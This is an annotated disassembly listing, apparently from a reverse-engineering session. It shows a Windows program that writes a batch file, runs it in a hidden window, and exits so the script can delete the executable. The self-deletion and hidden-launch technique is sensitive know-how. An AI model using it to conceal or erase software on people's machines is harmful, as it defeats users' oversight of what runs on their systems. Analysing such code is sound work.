0040122F |. 8D85 94FAFFFF lea eax,[local.347]
00401235 |. 50 push eax ; |/s
00401236 |. E8 CD010000 call <jmp.&MSVCRT.strlen> ; |\strlen
0040123B |. 59 pop ecx ; |
0040123C |. 40 inc eax ; |strlen+1: the terminating NUL byte is written into the .bat as well
0040123D |. 50 push eax ; |nBytesToWrite
0040123E |. 8D85 94FAFFFF lea eax,[local.347] ; |
00401244 |. 50 push eax ; |Buffer
00401245 |. 57 push edi ; |hFile
00401246 |. FF15 4C204000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile — result unchecked
0040124C |. 57 push edi ; /hObject
0040124D |. FF15 54204000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
00401253 |. 8D45 B8 lea eax,[local.18]
00401256 |. 50 push eax ; /pStartupinfo
00401257 |. FF15 38204000 call dword ptr ds:[<&KERNEL32.GetStartupInfoA>] ; \GetStartupInfoA
0040125D |. 804D E4 81 or byte ptr ss:[ebp-1C],81 ; si.dwFlags |= 0x81 (STARTF_USESHOWWINDOW | STARTF_FORCEOFFFEEDBACK)
00401261 |. 8D45 A8 lea eax,[local.22]
00401264 |. 50 push eax ; /pProcessInfo
00401265 |. 8D45 B8 lea eax,[local.18] ; |
00401268 |. 50 push eax ; |pStartupInfo
00401269 |. 56 push esi ; |CurrentDir => NULL
0040126A |. 56 push esi ; |pEnvironment => NULL
0040126B |. 56 push esi ; |CreationFlags => 0
0040126C |. 56 push esi ; |InheritHandles => FALSE
0040126D |. 56 push esi ; |pThreadSecurity => NULL
0040126E |. 56 push esi ; |pProcessSecurity => NULL
0040126F |. 56 push esi ; |CommandLine => NULL
00401270 |. 8D85 A4FEFFFF lea eax,[local.87] ; |
00401276 |. 50 push eax ; |ModuleFileName = .bat path (passed as lpApplicationName)
00401277 |. 66:8975 E8 mov word ptr ss:[ebp-18],si ; |si.wShowWindow = 0 (SW_HIDE)
0040127B |. FF15 3C204000 call dword ptr ds:[<&KERNEL32.CreateProcessA>] ; \CreateProcessA — result unchecked
00401281 |. 56 push esi ; /ExitCode => 0
00401282 |. FF15 40204000 call dword ptr ds:[<&KERNEL32.ExitProcess>] ; \ExitProcess — never returns; exiting releases the lock on the EXE so the script's del loop can succeed
00401288 |> 5F pop edi
00401289 |. 33C0 xor eax,eax ; return 0
0040128B |. 5E pop esi
0040128C |. C9 leave
0040128D \. C3 retn
}
004013F6 |. 33C0 xor eax,eax ; reached only if 0040117E could not create the .bat (otherwise ExitProcess has already been called)
004013F8 |. C9 leave
004013F9 \. C2 1000 retn 10 ; stdcall: pop the 4 WinMain arguments
}
00401548 |. 8945 98 mov [local.26],eax ; WinMain return value
0040154B |. 50 push eax ; /status
0040154C |. FF15 7C204000 call dword ptr ds:[<&MSVCRT.exit>] ; \exit — never returns
00401552 |. 8B45 EC mov eax,[local.5] ; SEH filter of the frame above: eax = EXCEPTION_POINTERS*
00401555 |. 8B08 mov ecx,dword ptr ds:[eax]
00401557 |. 8B09 mov ecx,dword ptr ds:[ecx] ; ecx = ExceptionRecord->ExceptionCode
00401559 |. 894D 88 mov [local.30],ecx
0040155C |. 50 push eax
0040155D |. 51 push ecx
0040155E |. E8 0F000000 call <jmp.&MSVCRT._XcptFilter> ; _XcptFilter(code, pointers)
00401563 |. 59 pop ecx
00401564 |. 59 pop ecx
00401565 \. C3 retn